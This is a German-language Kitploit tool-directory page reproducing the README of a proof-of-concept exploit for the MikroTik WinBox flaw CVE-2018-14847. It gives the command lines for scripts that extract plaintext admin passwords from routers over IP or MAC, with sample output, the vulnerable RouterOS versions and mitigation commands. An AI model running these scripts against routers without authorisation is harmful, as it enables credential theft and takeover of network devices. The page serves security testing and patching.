Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
winboxPOC — Proof of Concept der kritischen Winbox-Schwachstelle (CVE-2018-14847) | Kitploit
Tools/GitHubGitHub/tr33-he11/winboxpoc
AufklärungPasswortangriffeSchwachstellenanalyseExploitationInformationsbeschaffungNetzwerksicherheit
GitHubtr33-he11/winboxpoc

winboxPOC

Proof of Concept der kritischen Winbox-Schwachstelle (CVE-2018-14847)

Repository anzeigen
1vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WinboxExploit

Dies ist ein Proof of Concept der kritischen WinBox-Schwachstelle (CVE-2018-14847), die das beliebige Lesen von Dateien mit Klartext-Passwörtern ermöglicht.

Voraussetzungen

  • Python 3+

Dieses Skript läuft NICHT mit Python 2.x oder niedriger.

Verwendung

Das Skript wird einfach mit einfachen Argumenten in der Befehlszeile verwendet.

WinBox (TCP/IP)

Nutzen Sie die Schwachstelle aus und lesen Sie das Passwort.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Beispiel:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC server WinBox (Layer 2)

Sie können Dateien extrahieren, auch wenn das Gerät keine IP-Adresse hat.

Einfacher Erkennungscheck für lokal verbundene Mikrotik-Geräte.

root@kitploit:~
python3 MACServerDiscover.py

Beispiel:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Nutzen Sie die Schwachstelle aus und lesen Sie das Passwort.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Beispiel:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Verwundbare Versionen

Alle RouterOS-Versionen vom 28.05.2015 bis 20.04.2018 sind für diesen Exploit verwundbar.

Mikrotik-Geräte mit RouterOS-Versionen:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Weitere Informationen finden Sie unter: https://blog.mikrotik.com/security/winbox-vulnerability.html

Gegenmaßnahmen

  • Aktualisieren Sie den Router auf eine RouterOS-Version, die den Fix enthält.
  • Deaktivieren Sie den WinBox-Dienst auf dem Router.
  • Sie können den Zugriff auf den WinBox-Dienst mit Folgendem auf bestimmte IP-Adressen beschränken:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Sie können Filterregeln (ACL) verwenden, um externen Zugriff auf den WinBox-Dienst zu verweigern:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Der Zugriff auf den mac-winbox-Dienst kann eingeschränkt werden, indem erlaubte Schnittstellen angegeben werden:
root@kitploit:~
/tool mac-server mac-winbox
Tool herunterladen